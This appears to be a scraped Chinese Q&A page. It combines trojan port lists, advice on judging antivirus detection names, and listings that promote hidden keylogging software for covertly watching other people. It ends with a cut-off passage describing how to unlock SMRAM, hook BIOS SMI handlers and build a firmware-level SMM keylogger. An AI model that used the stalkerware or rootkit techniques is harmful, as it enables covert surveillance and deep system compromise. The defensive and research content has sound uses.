Troie开放5000、5001、5321、50505端口。 端口:5400、5401、5402 服务:[NULL] 说明:木马Blade Runner开放此端口。 端口:5550 服务:[NULL] 说明:木马xtcp开放此端口。 端口:5569 服务:[NULL] 说明:木马Robo-Hack开放此端口。 端口:5632 服务:pcAnywere 说明:有时会看到很多这个端口的扫描,这依赖于用户所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能的代理(这里的代理是指agent而不是proxy)。入侵者也会寻找开放这种服务的计算机。,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。 端口:5742 服务:[NULL] 说明:木马WinCrash1.03开放此端口。 端口:6267 服务:[NULL] 说明:木马广外女生开放此端口。 端口:6400 服务:[NULL] 说明:木马The tHing开放此端口。 端口:6670、6671 服务:[NULL] 说明:木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。 端口:6883 服务:[NULL] 说明:木马DeltaSource开放此端口。 端口:6969 服务:[NULL] 说明:木马Gatecrasher、Priority开放此端口。 端口:6970 服务:RealAudio 说明:RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。 端口:7000 服务:[NULL] 说明:木马Remote Grab开放此端口。 端口:7300、7301、7306、7307、7308 服务:[NULL] 说明:木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。 端口:7323 服务:[NULL] 说明:Sygate服务器端。 端口:7626 服务:[NULL] 说明:木马Giscier开放此端口。 端口:7789 服务:[NULL] 说明:木马ICKiller开放此端口。 端口:8000 服务:OICQ 说明:腾讯QQ服务器端开放此端口。 端口:8010 服务:Wingate 说明:Wingate代理开放此端口。 端口:8080 服务:代理端口 说明:WWW代理开放此端口。 端口:9400、9401、9402 服务:[NULL] 说明:木马Incommand 1.0开放此端口。 端口:9872、9873、9874、9875、10067、10167 服务:[NULL] 说明:木马Portal of Doom开放此端口。 端口:9989 服务:[NULL] 说明:木马iNi-Killer开放此端口。 端口:11000 服务:[NULL] 说明:木马SennaSpy开放此端口。 端口:11223 服务:[NULL] 说明:木马Progenic trojan开放此端口。 端口:12076、61466 服务:[NULL] 说明:木马Telecommando开放此端口。 端口:12223 服务:[NULL] 说明:木马Hack"99 KeyLogger开放此端口。 端口:12345、12346 服务:[NULL] 说明:木马NetBus1.60/1.70、GabanBus开放此端口。 端口:12361 服务:[NULL] 说明:木马Whack-a-mole开放此端口。 端口:13223 服务:PowWow 说明:PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。 端口:16969 服务:[NULL] 说明:木马Priority开放此端口。 端口:17027 服务:Conducent 说明:这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。 端口:19191 服务:[NULL] 说明:木马蓝色火焰开放此端口。 端口:20000、20001 服务:[NULL] 说明:木马Millennium开放此端口。 端口:20034 服务:[NULL] 说明:木马NetBus Pro开放此端口。 端口:21554 服务:[NULL] 说明:木马GirlFriend开放此端口。 端口:22222 服务:[NULL] 说明:木马Prosiak开放此端口。 端口:23456 服务:[NULL] 说明:木马Evil FTP、Ugly FTP开放此端口。 端口:26274、47262 服务:[NULL] 说明:木马Delta开放此端口。 端口:27374 服务:[NULL] 说明:木马Subseven 2.1开放此端口。 端口:30100 服务:[NULL] 说明:木马NetSphere开放此端口。 端口:30303 服务:[NULL] 说明:木马Socket23开放此端口。 端口:30999 服务:[NULL] 说明:木马Kuang开放此端口。 端口:31337、31338 服务:[NULL] 说明:木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。 端口:31339 服务:[NULL] 说明:木马NetSpy DK开放此端口。 端口:31666 服务:[NULL] 说明:木马BOWhack开放此端口。 端口:33333 服务:[NULL] 说明:木马Prosiak开放此端口。 端口:34324 服务:[NULL] 说明:木马Tiny Telnet Server、BigGluck、TN开放此端口。 端口:40412 服务:[NULL] 说明:木马The Spy开放此端口。 端口:40421、40422、40423、40426、 服务:[NULL] 说明:木马Masters Paradise开放此端口。 端口:43210、54321 服务:[NULL] 说明:木马SchoolBus 1.0/2.0开放此端口。 端口:44445 服务:[NULL] 说明:木马Happypig开放此端口。 端口:50766 服务:[NULL] 说明:木马Fore开放此端口。 端口:53001 服务:[NULL] 说明:木马Remote Windows Shutdown开放此端口。 端口:65000 服务:[NULL] 说明:木马Devil 1.03开放此端口。 端口:88 说明:Kerberos krb5。另外TCP的88端口也是这个用途。 端口:137 说明:SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。 端口:161 说明:Simple Network Management Protocol(SMTP)(简单网络管理协议)。 端口:162 说明:SNMP Trap(SNMP陷阱) 端口:445 说明:Common Internet File System(CIFS)(公共Internet文件系统) 端口:464 说明:Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。 端口:500 说明:Internet Key Exchange(IKE)(Internet密钥交换) 端口:1645、1812 说明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(远程认证拨号用户服务) 端口:1646、1813 说明:RADIUS accounting(Routing and Remote Access)(RADIUS记帐(路由和远程访问)) 端口:1701 说明:Layer Two Tunneling Protocol(L2TP)(第2层隧道协议) 端口:1801、3527 说明:Microsoft Message Queue Server(Microsoft消息队列服务器)。还有TCP的135、1801、2101、2103、2105也是同样的用途。 端口:2504 说明:Network Load Balancing(网络平衡负荷)
2023-07-15 09:12:111

如何快速判断一个程序是否带毒

这不是废话吗,在我们正式开始自己的探索之前,先让我们相信一下,“医生”的判断。 总所周知,杀毒软件存在着误报,漏报等多种不可靠情况。接下来,我要告诉你的是如何通过 正确姿势 ,尽可能的避免之前所说的问题。 我们很难在一台电脑上装多款杀毒软件,否则你很有可能使PC丧失基本的工作能力。 但是得益于网络的发展,我们有各种各样的工具,可以提供多种杀软的报毒结果。 VirusTotal报毒结果 VirusTotal报毒结果 遇到下面这些以及其他有明确描述的主类型,一般误报的可能性很小。 其中可以看到,ESET报毒名为 a variant of Win32/Packed.FlyStudio potentially unwanted 主类型为 Win32/Packed 家族名为 FlyStudio 无变种号。 其中 FlyStudio 是Eset对于易语言程序的别称,无论是否为病毒,只要是易语言基本都会有这个报毒名。所以对于我们没有参考价值。 Kaspersky报毒名为: not-a-virus:RiskTool.Win32.FlyStudio.dtk 同样没有参考价值,只是没有参考价值,并不能排除不是病毒的可能。 Microsoft 报毒名为: Trojan:Win32/Occamy.C 主类型为Trojan:Win32 家族名为Occamy 感叹号后面的字符串是变种号:C 看到微软的这个报毒名,就要小心了,虽然不能明白具体是什么样的病毒,但是是病毒的可能性大大提升了。 接下来再看BitDefender。 Generic.Keylogger.2.7E2302DA Generic的意思,一般是说这个是通过计算hash入库的,这种一般都很稳的。 Keylogger,字面意思,键盘记录。 看到这里,再结合40家的爆出率,基本就可以不用看了,病毒无误了。 360 HEUR/QVM11.1.CC2D.Malware.Gen 360的报毒名是最没用的了~什么有用的信息你也看不出来,其实讲道理,这个样本是我前几天就传了的,我没刷新VT报毒结果之前(详见PS),他是没报毒的... 微步在线 魔盾安全分析 腾讯哈勃 等等 再推荐一个好使的软件,可以快速看到文件的各类信息,以及VT结果等。 PPEE VT里没有 火绒 ,不过火绒的误报率还是很低的,可信度非常高。尤其是中国市场。起码不会把所有易语言都报毒。2333 PS: 如果是以前上传过的样本,VT不会重新分析,而会使用之前的结果,你需要使用VT自带的刷新功能,重新查看当前时间的报毒情况。 上文以1月31号的报毒结果为准。 emmmmm,不想写了,笔者语文水平太差,而且懒癌犯了。溜了。
2023-07-15 09:12:291

键盘记录器怎么删除?

查进程,看这个绑定在哪个进程上,直接终止进程
2023-07-15 09:12:375

卡巴测到病毒,他会自己动杀掉吗?还是自己动手?

自动会杀的
2023-07-15 09:12:513

求一个能保护文件,防止文件被写入的软件

建议您下载超级加密3000软件将文件加密试试。超级加密3000采用国际上成熟的加密算法和安全快速的加密方法,可以有效保障数据安全!
2023-07-15 09:13:022

有什么软件可以查看别人在我的机子上都做过些什么

925KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★ 你的同事和家人在你的机器上作了什么?他们是不是使用了你的工作帐号或者玩游戏;你的孩子趁家长不在是不是浏览了一些不应该去的网站;你负责的局域网中的用户是不是没有工作,而是在玩游戏。这些事情你可能都一无所知,pcLog软件能够确切的告诉你:他们已经做的和正在做的一切事情!pcLog能记录输入的汉字和鼠标、键盘(包括小键盘)的动作,还能记录互联网浏览地址,可以定时、定项的记录,并能通过局域网或广域网随时对目标机器查阅历史记录和用户屏幕,或者通过互联网发送历史记录文件,并可以对记录进行保存和管理。还能够对服务端程序进行卸载、更名、停止运行和自动升级等控制,非常适合家长、老板管理自己的机器和网络管理员管... 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版Keyboard Spectator Pro V3.32 文件大小:1,340KB 更新时间: 2004-10-27 下载次数:56次 软件星级:★★★ 如果你是想知道小孩如何使用计算机的家长,或者担心自己的计算机借给朋友时遭到滥用,该怎么办呢?如果不方便在别人的后面盯着看,那就让 Keyboard Spectator 代劳吧。它可以帮你监视计算机上所有按过的计算机按键,并在不让对方发现的情况下悄悄执行纪录的工作。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Family Keylogger V2.80 文件大小:115KB 更新时间: 2004-10-10 下载次数:55次 软件星级:★★★ Family Keylogger 是个计算机监控软件,它能以详细的 Log 文本文件将其它使用者的档案执行纪录条列纪录下来,只要调整模式为隐藏模式即开始纪录,软件的隐藏性佳,能消失于操作系统中的所有选单或安装纪录,让他人无法察觉此软件的存在。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Auto Keylogger V5.2 文件大小:497KB 更新时间: 2004-10-10 下载次数:54次 软件星级:★★★ 通过记录下你键盘的敲击,从而可以监测到你的会话,密码以及网上活动等。 软件分类:系统监视 操作系统:Windows 95/98/Me/NT/2000/XP 授权方式:试用版 Windows超级监视 V3.0 文件大小:171KB 更新时间: 2004-10-9 下载次数:51次 软件星级:★★★ 1.你是否遇到这种情况,当别人用你的电脑时,你希望知道他在你的电脑上作了什么动作,删除了什么文件!2.你是否遇到这种情况,有时一些软件在安装的时候,莫名的往硬盘里写了一些东西!你是不是想知道呢?3.如果不小心忘记了CMOS的密码,应该怎么办?4.如果不小心忘记了屏幕保护的密码,应该怎么办?5.想查看Windows中的******,而又不想动鼠标,应该怎么办?6.想查看Windows的进程?7.想查看CPU的使用情况?8.想查看内存中运行的软件?9.希望通过软件调用常用的工具!10.可以把软件监视的结果保存为文本文档!11.可以设置为软件自启动,而且自启动时隐藏!
2023-07-15 09:13:111

常用端口

1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了的主机发送每日格言 18 msp 消息发送协议 19 chargen 字符生成服务;发送无止境的字符流 20 ftp-data FTP 数据端口 21 ftp 文件传输协议(FTP)端口;有时被文件服务协议(FSP)使用 22 ssh 安全 Shell(SSH)服务 23 telnet Telnet 服务 25 smtp 简单邮件传输协议(SMTP) 37 time 时间协议 39 rlp 资源定位协议 42 nameserver 互联网名称服务 43 nicname WHOIS 目录服务 49 tacacs 用于基于 TCP/IP 验证和访问的终端访问控制器访问控制系统 50 re-mail-ck 远程邮件检查协议 53 domain 域名服务(如 BIND) 63 whois++ WHOIS++,被扩展了的 WHOIS 服务 67 bootps 引导协议(BOOTP)服务;还被动态主机配置协议(DHCP)服务使用 68 bootpc Bootstrap(BOOTP)客户;还被动态主机配置协议(DHCP)客户使用 69 tftp 小文件传输协议(TFTP) 70 gopher Gopher 互联网文档搜寻和检索 71 netrjs-1 远程作业服务 72 netrjs-2 远程作业服务 73 netrjs-3 远程作业服务 73 netrjs-4 远程作业服务 79 finger 用于用户联系信息的 Finger 服务 80 http 用于万维网(WWW)服务的超文本传输协议(HTTP) 88 kerberos Kerberos 网络验证系统 95 supdup Telnet 协议扩展 101 hostname SRI-NIC 机器上的主机名服务 102/tcp iso-tsap ISO 开发环境(ISODE)网络应用 105 csnet-ns 邮箱名称服务器;也被 CSO 名称服务器使用 107 rtelnet 远程 Telnet 109 pop2 邮局协议版本2 110 pop3 邮局协议版本3 111 sunrpc 用于远程命令执行的远程过程调用(RPC)协议,被网络文件系统(NFS)使用 113 auth 验证和身份识别协议 115 sftp 安全文件传输协议(SFTP)服务 117 uucp-path Unix 到 Unix 复制协议(UUCP)路径服务 119 nntp 用于 USENET 讨论系统的网络新闻传输协议(NNTP) 123 ntp 网络时间协议(NTP) 137 netbios-ns 在 红帽企业 Linux 中被 Samba 使用的 NETBIOS 名称服务 138 netbios-dgm 在 红帽企业 Linux 中被 Samba 使用的 NETBIOS 数据报服务 139 netbios-ssn 在 红帽企业 Linux 中被 Samba 使用的 NETBIOS 会话服务 143 imap 互联网消息存取协议(IMAP) 161 snmp 简单网络管理协议(SNMP) 162 snmptrap SNMP 的陷阱 163 cmip-man 通用管理信息协议(CMIP) 164 cmip-agent 通用管理信息协议(CMIP) 174 mailq MAILQ 电子邮件传输队列 177 xdmcp X 显示管理器控制协议(XDMCP) 178 nextstep NeXTStep 窗口服务器 179 bgp 边界网络协议 191 prospero Prospero 分布式文件系统服务 194 irc 互联网中继聊天(IRC) 199 smux SNMP UNIX 多路复用 201 at-rtmp AppleTalk 选路 202 at-nbp AppleTalk 名称绑定 204 at-echo AppleTalk echo 服务 206 at-zis AppleTalk 区块信息 209 qmtp 快速邮件传输协议(QMTP) 210 z39.50 NISO Z39.50 数据库 213 ipx 互联网络分组交换协议(IPX),被 Novell Netware 环境常用的数据报协议 220 imap3 互联网消息存取协议版本3 245 link LINK / 3-DNS iQuery 服务 347 fatserv FATMEN 文件和磁带官吏服务器 363 rsvp_tunnel RSVP 隧道 369 rpc2portmap Coda 文件系统端口映射器 370 codaauth2 Coda 文件系统验证服务 372 ulistproc UNIX LISTSERV 389 ldap 轻型目录存取协议(LDAP) 427 svrloc 服务位置协议(SLP) 434 mobileip-agent 可移互联网协议(IP)代理 435 mobilip-mn 可移互联网协议(IP)管理器 443 https 安全超文本传输协议(HTTP) 444 snpp 小型网络分页协议 445 microsoft-ds 通过 TCP/IP 的服务器消息块(SMB) 464 kpasswd Kerberos 口令和钥匙改换服务 468 photuris Photuris 会话钥匙管理协议 487 saft 简单不对称文件传输(SAFT)协议 488 gss-http 用于 HTTP 的通用安全服务(GSS) 496 pim-rp-disc 用于协议独立的多址传播(PIM)服务的会合点发现(RP-DISC) 500 isakmp 互联网安全关联和钥匙管理协议(ISAKMP) 535 iiop 互联网内部对象请求代理协议(IIOP) 538 gdomap GNUstep 分布式对象映射器(GDOMAP) 546 dhcpv6-client 动态主机配置协议(DHCP)版本6客户 547 dhcpv6-server 动态主机配置协议(DHCP)版本6服务 554 rtsp 实时流播协议(RTSP) 563 nntps 通过安全套接字层的网络新闻传输协议(NNTPS) 565 whoami whoami 用户ID列表 587 submission 邮件消息提交代理(MSA) 610 npmp-local 网络外设管理协议(NPMP)本地 / 分布式排队系统(DQS) 611 npmp-gui 网络外设管理协议(NPMP)GUI / 分布式排队系统(DQS) 612 hmmp-ind HyperMedia 管理协议(HMMP)表示 / DQS 631 ipp 互联网打印协议(IPP) 636 ldaps 通过安全套接字层的轻型目录访问协议(LDAPS) 674 acap 应用程序配置存取协议(ACAP) 694 ha-cluster 用于带有高可用性的群集的心跳服务 749 kerberos-adm Kerberos 版本5(v5)的“kadmin”数据库管理 750 kerberos-iv Kerberos 版本4(v4)服务 765 webster 网络词典 767 phonebook 网络电话簿 873 rsync rsync 文件传输服务 992 telnets 通过安全套接字层的 Telnet(TelnetS) 993 imaps 通过安全套接字层的互联网消息存取协议(IMAPS) 994 ircs 通过安全套接字层的互联网中继聊天(IRCS) 995 pop3s 通过安全套接字层的邮局协议版本3(POPS3) 回答者:ulins - 秀才 二级 12-10 22:56--------------------------------------------------------------------------------黑客软件最常用的连接端口 协议 端口=黑客程序 TCP 7=Echo TCP 20=FTP Data TCP 21=Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash TCP 23=Telnet, Tiny Telnet Server (= TTS) TCP 25=SMTP, Ajan, Antigen, Email Password Sender, Happy 99, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy TCP 31=Agent 31, Hackers Paradise, Masters Paradise TCP 41=DeepThroat TCP 43=WHOIS TCP 53=DNS,Bonk (DOS Exploit) TCP 59=DMSetup TCP 70=Gopher TCP 79=Firehotcker, Finger TCP 80=Http服务器, Executor, RingZero TCP 99=Hidden Port TCP 110=Pop3服务器, ProMail TCP 113=Kazimas, Auther Idnet TCP 119=Nntp, Happy 99 TCP 121=JammerKiller, Bo jammerkillah //TCP 137=NetBios-NS //TCP 138=NetBios-DGN //TCP 139=NetBios-SSN TCP 143=IMAP TCP 161=Snmp TCP 162=Snmp-Trap TCP 194=Irc TCP 421=TCP Wrappers TCP 456=Hackers paradise TCP 531=Rasmin TCP 555=Ini-Killer, Phase Zero, Stealth Spy TCP 666=Attack FTP, Satanz Backdoor TCP 808=RemoteControl TCP 911=Dark Shadow TCP 999=DeepThroat TCP 1001=Silencer, WebEx TCP 1010=Doly TCP 1011=Doly TCP 1012=Doly TCP 1015=Doly TCP 1024=NetSpy.698(YAI) //TCP 1025=NetSpy.698 //TCP 1033=Netspy //TCP 1042=Bla //TCP 1045=Rasmin //TCP 1047=GateCrasher TCP 1080=Wingate //TCP 1090=Xtreme, VDOLive //TCP 1170=Psyber Stream Server, Streaming Audio trojan //TCP 1234=Ultors //TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse //TCP 1245=VooDoo Doll //TCP 1269=Mavericks Matrix //TCP 1492=FTP99CMP(BackOriffice.FTP) //TCP 1509=Psyber Streaming Server //TCP 1600=Shivka-Burka //TCP 1807=SpySender //TCP 1981=Shockrave //TCP 1999=BackDoor, TransScout //TCP 2001=TrojanCow //TCP 2023=Ripper, Pass Ripper //TCP 2115=Bugs //TCP 2140=Deep Throat, The Invasor //TCP 2155=Illusion Mailer //TCP 2283=HVL Rat5 //TCP 2565=Striker //TCP 2583=WinCrash //TCP 2600=Digital RootBeer //TCP 2801=Phineas Phucker //TCP 3024=WinCrash trojan //TCP 3128=RingZero //TCP 3129=Masters Paradise //TCP 3150=Deep Throat, The Invasor //TCP 3210=SchoolBus //TCP 3459=Eclipse 2000 //TCP 3700=Portal of Doom //TCP 3791=Eclypse TCP 4000=腾讯OICQ客户端 TCP 4092=WinCrash TCP 4321=BoBo TCP 4567=File Nail TCP 4590=ICQTrojan TCP 5000=Bubbel, Back Door Setup, Sockets de Troie TCP 5001=Back Door Setup, Sockets de Troie TCP 5011=One of the Last Trojans (OOTLT) TCP 5031=Firehotcker TCP 5190=ICQ Query TCP 5321=Firehotcker TCP 5400=Blade Runner, BackConstruction1.2 TCP 5401=Blade Runner TCP 5402=Blade Runner TCP 5550=Xtcp TCP 5555=ServeMe TCP 5556=BO Facil TCP 5557=BO Facil TCP 5569=Robo-Hack TCP 5631=PCAnyWhere data TCP 5714=Wincrash3 TCP 5742=WinCrash TCP 6400=The Thing TCP 6667=NT Remote Control TCP 6669=Vampyre TCP 6670=DeepThroat TCP 6711=SubSeven TCP 6771=DeepThroat TCP 6776=BackDoor-G, SubSeven TCP 6883=DeltaSource TCP 6912=Shit Heep TCP 6939=Indoctrination TCP 6969=GateCrasher, Priority, IRC 3 TCP 6970=GateCrasher TCP 7000=Remote Grab TCP 7300=NetMonitor TCP 7301=NetMonitor TCP 7306=NetMonitor TCP 7307=NetMonitor, ProcSpy TCP 7308=NetMonitor, X Spy TCP 7323=Sygate服务器端 TCP 7626=冰河 TCP 7789=Back Door Setup, ICKiller TCP 8000=XDMA, 腾讯OICQ服务器端 TCP 8010=Logfile TCP 8080=WWW 代理, Ring Zero TCP 9400=InCommand TCP 9401=InCommand TCP 9402=InCommand TCP 9872=Portal of Doom TCP 9873=Portal of Doom TCP 9874=Portal of Doom TCP 9875=Portal of Doom TCP 9876=Cyber Attacker TCP 9878=TransScout TCP 9989=Ini-Killer TCP 10101=BrainSpy TCP 10167=Portal Of Doom TCP 10520=Acid Shivers TCP 10607=Coma trojan TCP 11000=Senna Spy TCP 11223=Progenic TCP 12076=Gjamer, MSH.104b TCP 12223=Hack?9 KeyLogger TCP 12345=GabanBus, NetBus, Pie Bill Gates, X-bill TCP 12346=GabanBus, NetBus, X-bill TCP 12361=Whack-a-mole TCP 12362=Whack-a-mole TCP 12631=WhackJob TCP 13000=Senna Spy TCP 16969=Priority TCP 17300=Kuang2 The Virus TCP 20000=Millennium II (GrilFriend) TCP 20001=Millennium II (GrilFriend) TCP 20034=NetBus 2 Pro TCP 20203=Logged TCP 20331=Bla TCP 21544=Schwindler 1.82, GirlFriend TCP 22222=Prosiak TCP 23456=Evil FTP, Ugly FTP, WhackJob TCP 23476=Donald Dick TCP 23477=Donald Dick TCP 27374=Sub Seven 2.0+ TCP 29891=The Unexplained TCP 30029=AOL trojan TCP 30100=NetSphere 1.27a, NetSphere 1.31 TCP 30101=NetSphere 1.31, NetSphere 1.27a TCP 30102=NetSphere 1.27a, NetSphere 1.31 TCP 30103=NetSphere 1.31 TCP 30303=Sockets de Troie TCP 30999=Kuang2 TCP 31336=Bo Whack TCP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO TCP 31339=NetSpy DK TCP 31666=BOWhack TCP 31785=Hack Attack TCP 31787=Hack Attack TCP 31789=Hack Attack TCP 31791=Hack Attack TCP 33333=Prosiak TCP 33911=Spirit 2001a TCP 34324=BigGluck, TN TCP 40412=The Spy TCP 40421=Agent 40421, Masters Paradise.96 TCP 40422=Masters Paradise TCP 40423=Masters Paradise.97 TCP 40426=Masters Paradise TCP 47878=BirdSpy2 TCP 50505=Sockets de Troie TCP 50766=Fore, Schwindler TCP 53001=Remote Windows Shutdown TCP 54320=Back Orifice 2000 TCP 54321=School Bus .69-1.11 TCP 60000=Deep Throat TCP 61466=Telecommando TCP 65000=Devil UDP 1349=BO dll UDP 2989=RAT UDP 3801=Eclypse UDP 10067=Portal of Doom UDP 10167=Portal of Doom UDP 26274=Delta Source UDP 29891=The Unexplained UDP 31337=Baron Night, BO client, BO2, Bo Facil, BackFire, Back Orifice, DeepBO UDP 31338=Back Orifice, NetSpy DK, DeepBO UDP 31789=Hack aTack UDP 31791=Hack aTack UDP 47262=Delta Source UDP 54321=Back Orifice 2000
2023-07-15 09:13:213

一个非常NB的病毒 我的卡巴 瑞星 360所有的专杀和木马专杀都拿他没法

那你一定没试 木马清道夫 http://fygsoft.com
2023-07-15 09:13:428

如何提取BIOS固件中的代码

2 逆向系统管理中断(SMI)句柄 或许有人认为应该动用“硬件分析器”来参与我们的宏伟计划,其实这是一种误解。SMI处理程序是BIOS固件的一部分,和普通的BIOS代码一样,也可以类似的从中将其反汇编出来。Pinczakko的《BIOS Disassembly Ninjutsu Uncovered 》和《Guide to Award BIOS Reverse Engineering》二书,讲述了Award and AMI BIOS逆向方面的详细情况,有兴趣的读者可以到此参考。在这里,从BIOS中转储SMI处理函数,我们有两种方法可供选择。 1. 找一个漏洞,从保护模式进入SMRAM,并将SMRAM中的所有内容,尤其是TSEG,High SMRAM和0xA0000-0xBFFFF等区域转储出来。如果BIOS没有锁定D_LCK位,可以通过Duflot和BSDaemon介绍的修改SMRAMC PCI配置寄存器的方式转储。万一BIOS锁定了SMRAM,BIOS固件看上去也无懈可击,那就只有修改BIOS,令其不会设置D_LCK位这一条路了。将修改的程序重刷回BIOS的ROM,这样在启动时,SMRAM就不会被锁定了。不过这样做首先要确定BIOS不需要数字签名(digitally signed),而且目前几乎没有主板会使用带数字签名的非EFIBIOS固件。 我想在这里有必要提一下BIOS设置D_LCK位的方法。通常情况下,BIOS都倾向于使用0xCF8/0xCFC端口,通过合法的I/O访问,设置相关的PCI配置寄存器。BIOS首先将0x8000009C写入到0xCF8的地址端口,然后再将0x1A的数值写入到0xCFC的数据端口,设置SMRAMC寄存器就可以锁定SMRAM了。 2. 还有另外一种方法,相对前者来说要简单一些,不需要访问运行时的SMRAM数据。 2.1 从BIOS开发商的网站下载最新的,或者使用闪存编程器件(Flash Programmer)从BIOS的ROM中提取固件的二进制代码。我们针对的ASUS P5Q主板就是要下载P5Q-ASUS-PRO-1613.ROM文件。 2.2 大多数的BIOS固件都包含了主BIOS模块,压缩的SMI处理句柄就位于其中,利用开发商提供的提取/解压工具打开BIOS主模块。由于ASUS BIOS是基于AMI BIOS的,我们使用AMIBIOS BIOS Module Manipulation Utility 和MMTool.exe从中抽取主模块。在MMTool中打开下载的.ROM文件,单击“Single Link Arch BIOS”抽取模块(ID=1Bh),然后检查“In uncompressed form”的选项,最后保存,就得到了包含SMI处理句柄的主BIOS模块。 2.3 主BIOS模块抽取完成,就可以用HIEW或IDA Pro等工具开始我们的SMI反汇编之旅了。 反汇编SMI句柄 我们注意到在ASUS/AMI BIOS中使用的是一个结构体数组来描述SMI的处理函数。数组中的每一个入口项都有“$SMIxx”的签名,其中“xx”字符指明了具体的SMI处理函数。图1显示的是基于P45芯片组ASUS P5Q SE主板的AMIBIOS 8所使用的SMI分配表(SMI dispatch table)数据。 反汇编SMI分配函数 BIOS中有一个特殊的SMI分配函数,我们将其命名为“dispatch_smi”,将遍历分配表中的所有入口,并调用handle_smi_ptr指向的处理函数。如果没有任何处理函数能够响应当前的SMI中断信号,它将调用最后的$DEF例程。下面的代码就是我们从ASUS P5Q主板反汇编得到的Handle_SMI BIOS函数。 钩挂SMI处理函数 基于上述的讨论,钩挂SMI处理函数的方法也有很多,可以添加一个新的SMI处理句柄,也可以给已有的句柄打个补丁,加上新的功能。两种方法在本质上并没有多大区别,所以两种情况我们都将做必要的介绍。 1.在SMI分配表中添加我们自己的SMI处理函数。 要加入新的函数,必须先在分配表中建立一个新的入口表项,我们将其取名为“$SMIaa”,如图3所示。 该入口包含了指向默认SMI处理句柄的指针,待会儿我们将修改这个默认的处理函数。或者我们也可以在SMRAM中找一块空闲区域,放上一段shellcode,将指向默认句柄的指针替换为指向shellcode。最后还要注意,当有新的处理函数加入到分配表中之后,保存在SMRAM数据段中的SMI代码计数值也要相应的加1,保持SMI处理函数数目的一致性。 上述这个“调试”处理函数只做了一件事情,就是将SMI分配表从0x0B428:[si]拷贝到0x07000:[di]的位置,看来我们可以放心大胆的用自己的SMI代码钩挂它了。随后,我们将实现一个键盘记录程序,将其注入到这个处理函数内部。不过在我们开始新的章节之前,还是有必要先来回顾一下可以用于在用户击键时,调用记录程序的相关技术。 1. 使用I/O APIC将键盘的硬件中断(IRQ #01)导向SMI。Shawn Embleton和Sherri Sparks采用的就是I/O高级可编程中断控制器,将键盘的IRQ #01号中断导向SMI,并在SMI处理程序中捕获击键事件。 2. 采用键盘控制器数据端口访问时的I/O陷阱机制。 我们在本文中使用了不同于前者的I/O陷阱技术,该项技术最初是BIOS模拟PS/2键盘的用途,在下一章节中我们将详细的解释其工作原理。 3 SMM键盘记录程序 3.1 硬件I/O陷阱机制 实现一个内核级的键盘记录程序,方法之一是钩挂中断描述符表(IDT)中的调试陷阱#DB处理函数,并设置调试寄存器DR0-DR3,用数据端口0x60捕获系统的击键事件。类似的,我们也可以采用通过键盘I/O端口60/64陷入SMI的方法。我们参考了AMI BIOS的设计白皮书《USB Support for AMIBIOS8》,里面有这样的一段叙述。 “2.5.4 60/64端口模拟(emulation) 该选项可以开启或者关闭60h/64h端口的陷阱功能。60h/64h端口陷阱允许BIOS为USB键盘和鼠标提供基于PS/2的完全支持,在Microsoft Windows NT操作系统和支持多语言键盘上尤为有用。该选项还为USB键盘提供了诸如键盘锁定,密码设置和扫描码选择等各项PS/2键盘的功能。” 该机制由硬件系统来完成,所以我们还要查看一下具体的硬件配置情况。好在Intel和AMD的CPU中都有I/O陷阱的相关机制。AMD开发手册《BIOS and Kernel"s Developer"s Guide for AMD Athlon 64 and AMD Opteron Processors》中的“SMM I/O Trap and I/O Restart”一节,和Intel手册《Intel IA-32 Architecture Software Developer"s Manual》中的“I/O State Implementation and I/O INSTRUCTION RESTART”一节对该机制都有详细的介绍。 I/O陷阱机制允许陷入SMI后,在SMI处理程序内部使用IN和OUT指令来访问系统的任意I/O端口。之所以设计该机制的目的是为了在断电时,通过I/O端口来开启(power on)某些设备。除此之外,I/O陷阱当然也可以用于在SMI句柄中模拟60h/64h的键盘端口。在某种程度上说,它和上述的调试陷阱机制有些类似,用陷阱捕获对I/O端口的访问,但是并非调用OS内核的调试陷阱处理句柄,而是产生一个SMI中断,让CPU进入SMM模式,执行I/O陷阱的SMI处理函数。 当处理器陷入I/O指令,进入SMM模式时,它会将I/O指令陷入时的所有信息保存在SMM存储状态映射区(Saved State Map)的I/O状态域(I/O State Field)中,位于SMBASE+0x8000+0x7FA4的位置。图4是该区域的数据分布情况,待会儿我们的记录程序将会用到。 -设置了IO_SMI (bit 0),表示当前是一个I/O陷阱SMI。 - I/O 长度标志(bits [1:3])表示 I/O访问是byte(001b)、word(010b)或dword(100b)三者之一。 - I/O Type标志(bits [4:7])表示I/O指令的类型,IN imm(1001b),IN DX(0001b)等。 - 